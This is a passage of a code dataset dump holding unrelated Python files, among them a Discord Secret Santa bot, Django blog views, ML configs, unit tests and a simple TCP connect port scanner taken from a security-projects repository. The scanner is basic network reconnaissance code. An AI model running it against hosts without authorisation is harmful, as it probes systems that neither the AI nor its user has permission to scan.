'rU').readlines()\n fhoutname = fileName[:-4]+'_refbase_filtered.csv'\n\n fhout = open(fhoutname, 'w')\n\n fhout.write(data[0])\n\n for each in data[1:]:\n flds = each.strip().split(',')\n if check_af(flds[-9:]):\n fhout.write(each)\n\n fhout.close()\n\n\ndef check_af(af):\n\n for each in af:\n if (len(each)>0) and (float(each)==1.0):\n return True # if any of the ref_base (allele freq of reference base) is 1.0, then we return True, and that line included in the output\n\n return False\n\n\ndef main():\n fileName = sys.argv[1]\n refBase_filter(fileName)\n\nif __name__ == '__main__':\n main()\n","repo_name":"singhalg/gsinghal_python_src","sub_path":"Cancer_Genomics/refBase_filter.py","file_name":"refBase_filter.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"39126163549","text":"import os\nimport discord\nfrom dotenv import load_dotenv\nfrom discord.utils import get\nfrom discord.ext import commands, tasks\nimport re\nimport random\nimport datetime\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\n\nclient = discord.Client()\n\n# Channel IDs:\n# id=796051477738684428 // wichtelchat\n# id=796376465741840444 // bot-test\n# id=796393926826655754 // geburtsdaten\n# id=796390311168835607 // wanderwichtelanmeldung\n\n#Initialisiert den Bot und die Variablen zum Programmstart\n@client.event\nasync def on_ready():\n print(f'{client.user} has connected to Discord!')\n\n # Channeldefinition\n global channel_wichtelchat\n global channel_bot_test\n global channel_geburtsdaten\n global channel_wanderwichtelanmeldung\n global channel_wichtelBotBefehle\n global birthdayList\n\n channel_wichtelchat = client.get_channel(796051477738684428)\n channel_bot_test = client.get_channel(796376465741840444)\n channel_geburtsdaten = client.get_channel(796393926826655754)\n channel_wanderwichtelanmeldung = client.get_channel(796390311168835607)\n channel_wichtelBotBefehle = client.get_channel(796441844933460059)\n birthdayList = [[],[],[]] # [0] name, [1] birthday, [2] giftbringer\n # check_for_birthdays_once_a_day.start()\n\n# Automatische Erinnerung\n#@tasks.loop(hours=24)\n#async def check_for_birthdays_once_a_day():\n# curDate = datetime.now()\n# curDate = curDate.strftime(\"%d.%m\")\n# print(curDate)\n\n# for birthday in birthdayList[1]:\n# print(str(birthday - curDate))\n \n\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n\n # Debug zum Connectioncheck\n if message.content == 'Hi':\n await message.channel.send(\"Ho\")\n\n # Nachrichten im Bot Befehle Channel\n if message.channel == channel_wichtelBotBefehle:\n \n # Gibt die Befehle aus\n if(message.content == 'help'):\n await message.channel.send(\"\\nDie Befehle sind:\\n\\troll again -> Startet die zufällige Ziehnung\\n\\tshow rolls -> Gibt die aktuellen Ziehungen aus\")\n\n # Zieht zufällig die Wichtelpaare und speichert sie in der txt-Datei\n if(message.content == 'roll again'):\n with open(\"birthdays.txt\", 'r') as file: # Parst die Datei birthdays.txt\n lines = file.readlines()\n birthdayList[0].clear()\n birthdayList[1].clear()\n birthdayList[2].clear()\n for line in lines:\n line = line.replace(\"\\n\", \"\")\n name, birthday, selectedPicker = line.split(':')\n tmpBirthdayArray = birthday.split('.')\n birthdayDateTime = datetime.datetime(2020, int(tmpBirthdayArray[1]), int(tmpBirthdayArray[0])) # Geburtstag als datetime\n birthdayDateTime = birthdayDateTime.strftime(\"%d.%m\")\n if(selectedPicker != 
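# Compatibility note for refBase_filter() above: the 'rU' universal-newlines
# mode was deprecated for years and finally removed in Python 3.11, so on
# current interpreters the open call would be simply:
#     data = open(fileName).readlines()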
\"\"):\n birthdayList[2].append(selectedPicker)\n birthdayList[0].append(name)\n birthdayList[1].append(birthdayDateTime)\n\n namesInList = \"\"\n selection = \"\"\n\n # Summiert die Namen mit Geburtstagen und LineBreaks zu einem String\n for index in range(len(birthdayList[0])): \n namesInList += birthdayList[0][index] + \" : \" + birthdayList[1][index] + \"\\n\"\n \n if(birthdayList[2][0] != \"\"):\n # Random shuffeling\n selbergezogen = True\n\n while selbergezogen:\n selbergezogen = False\n birthdayList[2] = birthdayList[0].copy()\n random.shuffle(birthdayList[2])\n \n for i in range(len(birthdayList[0])): # Man darf sich nicht selber ziehen\n if(birthdayList[0][i] == birthdayList[2][i]):\n selbergezogen = True\n\n # Output Ziehung\n for index in range(len(birthdayList[0])): \n selection += birthdayList[0][index] + \" : \" + birthdayList[2][index] + \"\\n\"\n\n output = \"############\\nIn der Ziehung enthalten sind:\\n\\n\"\n output += namesInList\n output += \"#######################\\n\"\n output += \"Die Ziehung hat ergeben:\\n(Beschenkter : Geschenkebringer)\\n\\n\"\n output += selection\n output += \"#######################\"\n await message.channel.send(output)\n\n # Save rolls\n with open(\"birthdays.txt\", \"w\") as file:\n for i in range(len(birthdayList[0])):\n file.write(birthdayList[0][i] + \":\" + birthdayList[1][i] + \":\" + birthdayList[2][i] + \"\\n\")\n\n # Gibt die aktuellen Ziehungen aus\n if(message.content == 'show rolls'):\n with open(\"birthdays.txt\", 'r') as file: # Parst die Datei birthdays.txt\n lines = file.readlines()\n birthdayList[0].clear()\n birthdayList[1].clear()\n birthdayList[2].clear()\n for line in lines:\n line = line.replace(\"\\n\", \"\")\n name, birthday, selectedPicker = line.split(':')\n tmpBirthdayArray = birthday.split('.')\n birthdayDateTime = datetime.datetime(2020, int(tmpBirthdayArray[1]), int(tmpBirthdayArray[0])) # Geburtstag als datetime\n birthdayDateTime = birthdayDateTime.strftime(\"%d.%m\")\n if(selectedPicker != \"\"):\n birthdayList[2].append(selectedPicker)\n birthdayList[0].append(name)\n birthdayList[1].append(birthdayDateTime)\n\n namesInList = \"\"\n selection = \"\"\n \n for index in range(len(birthdayList[0])): \n namesInList += birthdayList[0][index] + \" : \" + birthdayList[1][index] + \"\\n\"\n for index in range(len(birthdayList[0])): \n selection += birthdayList[0][index] + \" : \" + birthdayList[2][index] + \"\\n\"\n\n output = \"############\\nIn der Ziehung enthalten sind:\\n\\n\"\n output += namesInList\n output += \"#######################\\n\"\n output += \"Die Ziehung hat ergeben:\\n(Beschenkter : Geschenkebringer)\\n\\n\"\n output += selection\n output += \"#######################\"\n await message.channel.send(output)\n\n \n \n\n # Geburtsdatum in Channel Geburtsdaten eingeben und in Textdatei speichern\n if message.channel == channel_geburtsdaten:\n if re.search(r\"^[0-9]{2}\\.[0-9]{2}$\", message.content):\n date = message.content.split('.')\n if(int(date[0]) <= 31):\n if(int(date[1]) <=12):\n await message.author.remove_roles(get(message.author.guild.roles , name='Wichtel-Wanderer_unbestaetigt'))\n await message.author.add_roles(get(message.author.guild.roles , name='Wichtel-Wanderer'))\n with open(\"birthdays.txt\", \"a\") as file:\n file.write(str(message.author) + \":\" + message.content + \":\\n\")\n else:\n await message.delete()\n else:\n await message.delete()\n else:\n await message.delete()\n\n # Channel ID zum debuggen ausgeben\n if message.content == 'get_channel_id':\n print(message)\n \n# 
Verteilt Rollen, wenn man mit einem Geschenk reacted\n@client.event\nasync def on_reaction_add(reaction, user):\n if user == client.user:\n return\n if reaction.emoji == 'ðŸŽ�':\n await user.add_roles(get(user.guild.roles , name='Wichtel-Wanderer_unbestaetigt'))\n await user.remove_roles(get(user.guild.roles , name='Wichtel-Wanderer'))\n await channel_wichtelchat.send('{0} ist jetzt beim Wichteln dabei, Gratulation!!'.format(user))\n\nclient.run(TOKEN)","repo_name":"TheS1mon/Discord_Bots","sub_path":"WichtelMann/wichtelMann_1.0.0.py","file_name":"wichtelMann_1.0.0.py","file_ext":"py","file_size_in_byte":7913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9264898647","text":"# -*- encoding: utf-8 -*-\n\n\"\"\"Common exceptions for the inventory manager.\n\"\"\"\n\n\nclass ExistingMACAddress(Exception):\n code = 409\n message = u'A server with the MAC address %(address)s already exists.'\n\n def __init__(self, address, message=None, **kwargs):\n \"\"\"\n :param address: The conflicting MAC address.\n :param message: The exception message. Optional\n \"\"\"\n\n if not message:\n # Construct the default message.\n message = self.message % address\n\n super(ExistingMACAddress, self).__init__(message)\n\n\nclass ExistingServerName(Exception):\n code = 409\n message = u'A server using the name %(name)s already exists.'\n\n def __init__(self, name, message=None, **kwargs):\n \"\"\"\n :param name:\n :param message:\n :param kwargs:\n \"\"\"\n\n if not message:\n message = self.message % name\n\n super(ExistingServerName, self).__init__(message)\n\n\nclass ExistingServer(Exception):\n code = 409\n message = u'This server already exists.'\n\n def __init__(self):\n super(ExistingServer, self).__init__()\n\n\nclass ServerNotFound(Exception):\n code = 404\n message = u'The server %(identifier)s was not found.'\n\n def __init__(self, message=None, **kwargs):\n \"\"\"\n :param message: An overridden exception message.\n :param uuid: The server's uuid\n :param name: The server's name\n \"\"\"\n\n if not message:\n if kwargs.get('name'):\n message = self.message % kwargs['name']\n elif kwargs.get('uuid'):\n message = self.message % kwargs['uuid']\n else:\n message = u'The server was not found.'\n\n super(ServerNotFound, self).__init__(message)\n\n\nclass ServerReserved(Exception):\n message = ('The server %(uuid) has an existing reservation, please remove'\n ' the reservation and retry.')\n\n def __init__(self, message=None, **kwargs):\n \"\"\"\n :param message:\n :param server_uuid:\n \"\"\"\n\n if not message:\n uuid = kwargs.get('server_uuid')\n if not uuid:\n message = ('The server has an existing reservation, please'\n ' remove and retry the operation.')\n else:\n message = self.message % uuid\n\n super(ServerReserved, self).__init__(message)\n\n\nclass ServerNotReserved(Exception):\n message = 'The server %(server_uuid)s does not have a reservation.'\n\n def __init__(self, message=None, **kwargs):\n\n if not message:\n uuid = kwargs.get('server_uuid')\n if not uuid:\n message = 'The server does not have an existing reservation.'\n else:\n message = self.message % uuid\n\n super(ServerNotReserved, self).__init__(message)\n\n\nclass ServerNotDeployed(Exception):\n message = 'The server %(uuid)s is not in a deployed state.'\n\n def __init__(self, message=None, **kwargs):\n \"\"\"\n :param message: A custom message.\n :param uuid: The server's uuid\n \"\"\"\n\n if not message:\n uuid = kwargs.get('uuid')\n if not uuid:\n message = 'The server 
is not in a deployed state.'\n else:\n message = self.message % uuid\n\n super(ServerNotDeployed, self).__init__(message)\n","repo_name":"softlayer/ironic-inventory-integrator","sub_path":"ironic_inventory/common/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"31089834353","text":"count=0 #引入计数器\nn=int(input())\nal=list(map(int,input().split()))\na=int(input())\nfor i in range(len(al)):\n if a==al[i]:\n print(i+1) #数列从0开始计算,要知道编号需+1\n count+=1 #如果数列长度为1,则不会触发下面的if\n break\n#如果找不到,输出-1\nif count==0:\n print(-1)","repo_name":"QiYi92/StudyLab","sub_path":"Python/python_lanqiao/查找整数.py","file_name":"查找整数.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"13516623799","text":"import socket\n\ndef scan_ports(target_ip, start_port, end_port):\n \"\"\"Scan ports of a target IP from start_port to end_port.\"\"\"\n \n open_ports = []\n \n for port in range(start_port, end_port + 1):\n # Create a new socket using the combined IP and port\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # Set a timeout for the socket to prevent hanging\n s.settimeout(1)\n # Attempt to establish a connection\n result = s.connect_ex((target_ip, port))\n \n # If the result is 0, the connection was successful\n if result == 0:\n open_ports.append(port)\n \n s.close()\n \n return open_ports\n\nif __name__ == \"__main__\":\n target = input(\"Enter target IP to scan: \")\n start = int(input(\"Enter start port number: \"))\n end = int(input(\"Enter end port number: \"))\n\n open_ports_list = scan_ports(target, start, end)\n \n if open_ports_list:\n print(f\"Open ports on {target} are: {', '.join(map(str, open_ports_list))}\")\n else:\n print(f\"No open ports found on {target} between ports {start} and {end}.\")\n","repo_name":"DAVEALLCAPS/python-security-projects","sub_path":"PortScanner/portscanner.py","file_name":"portscanner.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9999365406","text":"from django.shortcuts import get_object_or_404, render,redirect\nfrom django.views import View\nfrom django.db.models import Q\nfrom .models import Post,Comment,NewsLetter,AboutUs,Tags,Categories,Profile,Contact\nfrom .forms import CommentForm, NewsLetterForm,ContactForm\nfrom django.views.generic import UpdateView,ListView\nfrom django.urls import reverse_lazy\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.mixins import UserPassesTestMixin\nfrom django.contrib import messages\n\n\n\nclass IndexView(View):\n def get(self,request,*args,**kwargs):\n posts = Post.objects.all()[:6]\n tags = Tags.objects.all()\n categories = Categories.objects.all()[:3]\n\n context = {\n 'posts':posts,\n 'categories':categories,\n 'tags':tags\n }\n return render(request,'blog/index.html',context)\n\nclass BlogList(View):\n def get(self,request,*args,**kwargs):\n posts = Post.objects.all()\n categories = Categories.objects.all()\n\n\n\n context={\n 'posts':posts,\n 'categories':categories\n }\n return render(request,'blog/blog_list.html',context)\n\nclass BlogDetail(View):\n def get(self,request,slug,*args,**kwargs):\n # post = get_object_or_404(Post,slug=slug)\n post = Post.objects.get(slug=slug)\n comment = Comment.objects.filter(post=post)\n related_posts = 
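# Bug note for the exceptions module above: '%(address)s'-style templates
# require a mapping on the right-hand side, so expressions such as
# `self.message % address` raise "TypeError: format requires a mapping".
# The working form (the same fix applies to the other exception classes) is:
#     message = self.message % {'address': address}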
Post.objects.all()[:6]\n\n context={\n 'post':post,\n 'comments':comment,\n 'related_posts':related_posts,\n }\n return render(request,'blog/detail.html',context)\nclass CommentView(View):\n def post(self,request,pk,*args,**kwargs):\n post = Post.objects.get(pk=pk)\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.post = post\n comment.save()\n messages.success(request,'Your comment has been added')\n # return redirect('blog_detail',pk=post.pk)\n return render(request,'blog/partials/comment.html',{'form':form,'post':post})\nclass CommentEditView(UserPassesTestMixin,UpdateView):\n model = Comment\n fields = ['comment']\n template_name = 'social/comment_edit.html'\n def get_success_url(self):\n pk = self.kwargs['pk']\n return reverse_lazy('post_detail',kwargs={'pk':pk})\n\n def test_func(self):\n post = self.get_object()\n return self.request.user == post.author\nclass CommentReplyView(View):\n def post(self,request, post_pk,pk,*args,**kwargs):\n post = Post.objects.get(pk=post_pk)\n parent_comment = Comment.objects.get(pk=pk)\n form = CommentForm(request.POST)\n\n if form.is_valid():\n new_comment = form.save(commit=False)\n new_comment.parent = parent_comment\n new_comment.post = post\n new_comment.save()\n\n context={\n 'post':post,\n 'comment':parent_comment,\n }\n\n return render(request,'blog/partials/comment_reply.html',context)\n\n\nclass NewsLetterView(View):\n def post(self,request,*args,**kwargs):\n form= NewsLetterForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request,\"Thanks for your subscription, you'll receive updates from us weekly\")\n return render(request,'blog/partials/newsletter.html',{'form':form})\n\nclass ContactTemplate(View):\n def get(self,request,*args,**kwargs):\n return render(request,'blog/contact_filler.html')\n\n\nclass ContactView(View):\n def post(self,request,*args,**kwargs):\n contact = ContactForm(request.POST)\n if contact.is_valid:\n contact.save()\n messages.success(request,\"Thanks for contacting us, Our response would get to you soon.\")\n return render(request,'blog/partials/contact.html',{'form':contact})\n\nclass SearchView(View):\n def get(self,request,*args,**kwargs):\n query = self.request.GET.get('query')\n\n posts = Post.objects.filter(\n Q(body__icontains=query))\n\n comments = Comment.objects.filter(\n Q(body__icontains=query)|Q(author__icontains=query))\n\n categories = Categories.objects.filter(\n Q(category_name__icontains=query)|Q(category_title__icontains=query)|\n Q(category_description__icontains=query)\n )\n profiles = Profile.objects.filter(\n Q(name__icontains=query)|Q(proffession__icontains=query)|\n Q(bio__icontains=query))\n context ={\n 'profiles':profiles,\n 'posts':posts,\n 'comments':comments,\n 'categories':categories,\n }\n\n return render(request,'blog/searches.html',context)\n\n\nclass ExploreTagView(View):\n def get(self,request,*args,**kwargs):\n query = self.request.GET.get('tag_query')\n tag = Tags.objects.filter(tag_name=query).first()\n tags = Tags.objects.all()\n \n posts = None\n if tags:\n posts = Post.objects.filter(tags__in =[tag])\n context ={\n 'query':query,\n 'tags':tags,\n 'tag':tag,\n 'posts':posts,\n }\n\n return render(request,'blog/tags.html',context)\n\n def post(self,request,*args,**kwargs):\n explore_form = self.request.POST.get('tag_query')\n \n tag = Tags.objects.filter(tag_name=explore_form)\n\n posts = None\n if tag:\n posts = Post.objects.filter(tags__in=[tag])\n\n if posts:\n context = {\n 'tags':tag,\n 
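# [Illustrative sketch] SearchView above OR-combines case-insensitive
# lookups with Q objects; the same idea as a small standalone helper
# (the helper name is hypothetical; Post, body and slug are fields from
# the snippet's models, assumed imported at the top of this module):
from django.db.models import Q

def search_posts(query):
    return Post.objects.filter(Q(body__icontains=query) | Q(slug__icontains=query))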
'posts':posts\n }\n else:\n context = {\n 'tags':tag\n }\n return HttpResponseRedirect(f'/blog/tags?tag_query={explore_form}')\n \nclass CategoriesListView(ListView):\n context_object_name = 'categories'\n model = Categories\n page_kwarg = 'page'\n paginate_by = 10\n template_name = 'blog/category-list.html'\n\nclass CategoryDetailView(View):\n def get(self,request,pk,*args,**kwargs):\n category = Categories.objects.get(pk=pk)\n posts = Post.objects.filter(category=category).all()\n\n context={\n 'category':category,\n 'posts':posts,\n }\n return render(request,'blog/category.html',context)\n\nclass AboutUsView(View):\n def get(self,request,*args,**kwargs):\n profiles = Profile.objects.all()\n about = AboutUs.objects.all()\n\n context={\n 'about':about,\n 'profiles':profiles,\n }\n return render(request,'blog/about.html',context)\n\nclass AuthorProfileView(View):\n def get(self,request,slug,*args,**kwargs):\n profile = Profile.objects.get(slug=slug)\n posts = Post.objects.filter(author=profile.user)\n\n context ={\n 'profile':profile,\n 'posts':posts,\n }\n return render(request,'blog/profile.html',context)\n","repo_name":"DeFidelity/heedngrow","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6969,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"17482227255","text":"from math import log10\n\nfrom mock import Mock\nfrom nose.tools import eq_\n\nfrom mkt.constants.base import STATUS_REJECTED\nfrom mkt.site.tests import TestCase\nfrom mkt.site.utils import app_factory\nfrom mkt.search.utils import get_boost, get_popularity, get_trending\nfrom mkt.websites.utils import website_factory\n\n\nclass TestSearchUtils(TestCase):\n def _test_get_trending(self, obj):\n # Test no trending record returns zero.\n eq_(get_trending(obj), 0)\n\n # Add a region specific trending and test the global one is returned\n # because the region is not mature.\n region = Mock(id=1337, adolescent=True)\n obj.trending.create(value=42.0, region=0)\n obj.trending.create(value=10.0, region=region.id)\n eq_(get_trending(obj, region=region), 42.0)\n\n # Now test the regional trending is returned when adolescent=False.\n region.adolescent = False\n eq_(get_trending(obj, region=region), 10.0)\n\n def test_get_trending_app(self):\n app = app_factory()\n self._test_get_trending(app)\n\n def test_get_trending_website(self):\n website = website_factory()\n self._test_get_trending(website)\n\n def _test_get_popularity(self, obj):\n # Test no popularity record returns zero.\n eq_(get_trending(obj), 0)\n\n # Add a region specific popularity and test the global one is returned\n # because the region is not mature.\n region = Mock(id=1337, adolescent=True)\n obj.popularity.create(value=42.0, region=0)\n obj.popularity.create(value=10.0, region=region.id)\n eq_(get_popularity(obj, region=region), 42.0)\n\n # Now test the regional popularity is returned when adolescent=False.\n region.adolescent = False\n eq_(get_popularity(obj, region=region), 10.0)\n\n def test_get_popularity_app(self):\n app = app_factory()\n self._test_get_popularity(app)\n\n def test_get_popularity_website(self):\n website = website_factory()\n self._test_get_popularity(website)\n\n def test_get_boost_app(self):\n app = app_factory()\n app.popularity.create(region=0, value=1000.0)\n eq_(get_boost(app), log10(1 + 1000) * 4)\n\n def test_get_boost_app_not_approved(self):\n app = app_factory(status=STATUS_REJECTED)\n app.popularity.create(region=0, value=1000.0)\n 
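# [Illustrative sketch] These tests pin down the scoring rule without
# showing it; a hedged reimplementation consistent with the eq_()
# assertions (an assumption -- the real code lives in mkt.search.utils):
from math import log10

def boost_from_popularity(popularity, public=True):
    base = log10(1 + popularity)         # dampen raw popularity counts
    return base * 4 if public else base  # 4x multiplier only for approved items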
eq_(get_boost(app), log10(1 + 1000))\n\n def test_get_boost_website(self):\n website = website_factory()\n website.popularity.create(region=0, value=1000.0)\n eq_(get_boost(website), log10(1 + 1000) * 4)\n","repo_name":"mozilla/zamboni","sub_path":"mkt/search/tests/test_utils_.py","file_name":"test_utils_.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":476,"dataset":"github-code","pt":"3"} +{"seq_id":"9322940772","text":"from gpiozero import OutputDevice\nfrom time import sleep\nimport ParameterStorage\nfrom Enums import isWindow\nfrom glob import glob\nfrom os import path\nimport TheManager\nimport sys\n\nrelay1 = OutputDevice(6) #relay hooked on pin 6 - note that the relay is activated with a LOW SIGNAL (off)\nrelay2 = OutputDevice(5) #relay hooked on pin 5 - note that the relay is activated with a LOW SIGNAL (off)\nduration = 15 #how long should relays be switched on during opening/closing\n\n\nWINDOW_OPEN_PARAM_NAME = \"Okno\"\nParameterStorage.addParameter(WINDOW_OPEN_PARAM_NAME,\"\")\n__isWindowOpen = isWindow.unknown\n\ndef readMarker()-> isWindow: \n try: \n list_of_files = glob(TheManager.TheManager.markerDirectory+\"*\")\n latest_file = max(list_of_files, key=path.getctime)\n print(latest_file)\n if latest_file.find(\"open\")>=0:\n print(\"I think the window is currently OPEN\")\n return isWindow.open\n elif latest_file.find(\"close\")>=0:\n print(\"I think the window is currently CLOSED\")\n return isWindow.close\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n return isWindow.unknown\n \n\n\ndef isWindowOpen():\n global __isWindowOpen\n if __isWindowOpen==isWindow.unknown:\n __isWindowOpen=readMarker()\n ParameterStorage.provideValue(WINDOW_OPEN_PARAM_NAME,__isWindowOpen)\n return __isWindowOpen\n\n\ndef controllerOpenWindow():\n global relay1\n global relay2\n global duration\n global __isWindowOpen\n print(\"Open\")\n try:\n relay2.off()\n relay1.on()\n sleep(duration-2)\n __isWindowOpen=isWindow.open\n finally:\n controllerTurnRelaysOff()\n\ndef controllerCloseWindow():\n global relay1\n global relay2\n global duration\n global __isWindowOpen\n print(\"Close\")\n try:\n relay1.off()\n relay2.on()\n sleep(duration)\n __isWindowOpen=isWindow.close\n finally:\n controllerTurnRelaysOff()\n\ndef controllerTurnRelaysOff():\n global relay1\n global relay2\n print(\"Relays off\")\n try: #to turn the relay off you nedd to set the corresponding signal high\n relay2.on()\n relay1.on()\n except:\n print(\"That went wrong in closing relays...\")\n\n ","repo_name":"dziq1981/WindowsController","sub_path":"WindowsController.py","file_name":"WindowsController.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"875106156","text":"import pandas as pd\n\nfrom postgres_helpers import DBContext\nfrom src.dags.update_hospitalizations.etl_hospitalizations import (\n etl_hospitalizations,\n HOSPITALIZATIONS_ARGS,\n)\nfrom src.lib.test_helpers import run_task_with_url\n\n[_, HOSPITALIZATIONS_SCHEMA, HOSPITALIZATIONS_TABLE] = HOSPITALIZATIONS_ARGS\nHOSPITALIZATIONS_URL = \"http://static-files/static/hospitalizations.csv\"\n\n\ndef test_etl_hospitalizations(pg_context: DBContext):\n\n run_task_with_url(\n \"nuts_regions_population\",\n \"load_nuts_regions\",\n \"http://static-files/static/NUTS2021.xlsx\",\n )\n run_task_with_url(\n \"nuts_regions_population\",\n \"load_population_for_nuts_regions\",\n 
\"http://static-files/static/demo_r_pjangrp3.tsv\",\n )\n\n etl_hospitalizations(\n HOSPITALIZATIONS_URL, HOSPITALIZATIONS_SCHEMA, HOSPITALIZATIONS_TABLE\n )\n\n hospitalizations = pd.read_sql(\n f\"SELECT * FROM {HOSPITALIZATIONS_SCHEMA}.{HOSPITALIZATIONS_TABLE}\",\n pg_context[\"connection\"],\n )\n\n assert len(hospitalizations) == 82\n\n\ndef test_etl_runs_in_dag(pg_context: DBContext):\n\n run_task_with_url(\n \"nuts_regions_population\",\n \"load_nuts_regions\",\n \"http://static-files/static/NUTS2021.xlsx\",\n )\n run_task_with_url(\n \"nuts_regions_population\",\n \"load_population_for_nuts_regions\",\n \"http://static-files/static/demo_r_pjangrp3.tsv\",\n )\n\n run_task_with_url(\n \"update_hospitalizations\", \"load_hospitalizations\", HOSPITALIZATIONS_URL\n )\n\n hospitalizations = pd.read_sql(\n f\"SELECT * FROM {HOSPITALIZATIONS_SCHEMA}.{HOSPITALIZATIONS_TABLE}\",\n pg_context[\"connection\"],\n )\n\n assert len(hospitalizations) == 82\n","repo_name":"rocs-org/data-pipelines","sub_path":"services/airflow/src/dags/update_hospitalizations/test_etl_hospitalizations.py","file_name":"test_etl_hospitalizations.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"30513141322","text":"# model settings\nmodel = dict(\n type='Recognizer2D',\n backbone=dict(\n type='ResNet',\n pretrained='torchvision://resnet50',\n depth=50,\n norm_eval=False,\n partial_bn=True),\n cls_head=dict(\n type='TRNHead',\n num_classes=400,\n in_channels=2048,\n num_segments=8,\n spatial_type='avg',\n relation_type='TRNMultiScale',\n hidden_dim=256,\n dropout_ratio=0.8,\n init_std=0.001,\n average_clips='prob'),\n data_preprocessor=dict(\n type='ActionDataPreprocessor',\n mean=[123.675, 116.28, 103.53],\n std=[58.395, 57.12, 57.375],\n format_shape='NCHW'))\n","repo_name":"open-mmlab/mmaction2","sub_path":"configs/_base_/models/trn_r50.py","file_name":"trn_r50.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":3560,"dataset":"github-code","pt":"3"} +{"seq_id":"70432629202","text":"import unittest\n\nfrom pitch_contour import *\nimport numpy as np\n\nnp.random.seed(10)\nclass PitchContourTest(unittest.TestCase):\n def enumerate_assignments(i, assignment, N, pitch, frequencies):\n if i == N:\n print (pitch.get_assignment_weight(assignment), assignment)\n else:\n for j in frequencies[i]:\n assignment[i] = j\n enumerate_assignments(i + 1, assignment, N, pitch, frequencies)\n\n def test_freqbin(self):\n bin = getBinFromFrequency(440.0)\n self.assertEqual(bin, 58)\n self.assertEqual(getBinFromFrequency(523), 61)\n\n def test_training(self):\n data = [[1, 2 ,3, 2, 4], [1, 2, 4, 3, 4], [1, 1, 2]]\n trainTransition(data, range(5), \"train.npy\")\n probabilities = np.load(\"train.npy\").item()\n # Verify that all probabilities sum to 1.\n for i in range(5):\n count = 0\n for j in range(5):\n count += probabilities[(i,j)]\n self.assertEqual(int(round(count)), 1)\n\n def test_get_weights(self):\n flat_pitch = PitchContour()\n K = 2\n N = 4\n frequencies = np.array([\n [16, 15],\n [15, 14],\n [12, 13],\n [10, 12]\n ])\n probabilities = np.array([\n [0.1, 0.9],\n [0.1, 0.9],\n [0.45, 0.55],\n [0, 1]\n ])\n flat_pitch.setNotes(N, K, probabilities, frequencies)\n\n assignment = {0: 15, 1: 14, 2: 13, 3: 12}\n self.assertEqual(flat_pitch.get_assignment_weight(assignment), \\\n flat_pitch.get_delta_weight({}, 0, 15) + flat_pitch.get_delta_weight({0:15}, 1, 14) + \\\n 
flat_pitch.get_delta_weight({0:15, 1: 14}, 2, 13) + flat_pitch.get_delta_weight({0:15, 1: 14, 2: 13}, 3, 12))\n\n def test_inference(self):\n flat_pitch = PitchContour()\n K = 2\n N = 4\n frequencies = np.array([\n [16, 15],\n [15, 14],\n [12, 13],\n [10, 12]\n ])\n probabilities = np.array([\n [0.1, 0.9],\n [0.1, 0.9],\n [0.45, 0.55],\n [0, 1]\n ])\n flat_pitch.setNotes(N, K, probabilities, frequencies)\n solutionCSP = flat_pitch.solve()\n solutionBacktrack = flat_pitch.solve(mode='backtrack')\n self.assertTrue(solutionBacktrack == solutionCSP)\n\n def test_both(self):\n data = [[1, 2 ,3, 2, 4], [1, 2, 4, 3, 4], [1, 1, 2]]\n transition = np.load(\"train.npy\").item()\n pitch = PitchContour()\n K = 2\n N = 4\n bins = np.array([\n [1, 4],\n [2, 3],\n [3, 1],\n [2, 4]\n ])\n probabilities = np.array([\n [0.9, 0.1],\n [0.5, 0.5],\n [0.45, 0.55],\n [1, 0]\n ])\n pitch.setTransitionProbability(lambda f1, f2 : transition[(f1, f2)])\n pitch.setNotes(N, K, probabilities, bins)\n solutionCSP = pitch.solve()\n solutionBacktrack = pitch.solve(mode='backtrack')\n print (solutionBacktrack, solutionCSP)\n\n def test_gibbs(self):\n data = [[1, 2 ,3, 2, 4], [1, 2, 4, 3, 4], [1, 1, 2]]\n transition = np.load(\"train.npy\").item()\n pitch = PitchContour()\n K = 2\n N = 4\n bins = np.array([\n [1, 4],\n [2, 3],\n [3, 1],\n [2, 4]\n ])\n probabilities = np.array([\n [0.9, 0.12],\n [0.5, 0.5],\n [0.45, 0.55],\n [1, 0]\n ])\n pitch.setTransitionProbability(lambda f1, f2 : transition[(f1, f2)])\n pitch.setNotes(N, K, probabilities, bins)\n solutionCSP = pitch.solve(mode=\"gibbs\")\n solutionBacktrack = pitch.solve(mode='backtrack')\n print (solutionBacktrack, solutionCSP)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"ClaraBing/CS229-MusicTranscription","sub_path":"cspTest.py","file_name":"cspTest.py","file_ext":"py","file_size_in_byte":3768,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"3"} +{"seq_id":"17323536006","text":"#coding: utf-8\n\ndef valida_triangulo(a, b, c):\n\tif a>((b-c)*-1) and a<(b+c) and b>((a-c)*-1) and b<(a+c) and c>((a-b)*-1) and c<(a+b):\n\t\tresultado = a+b+c\n\t\tprint(\"Perímetro: 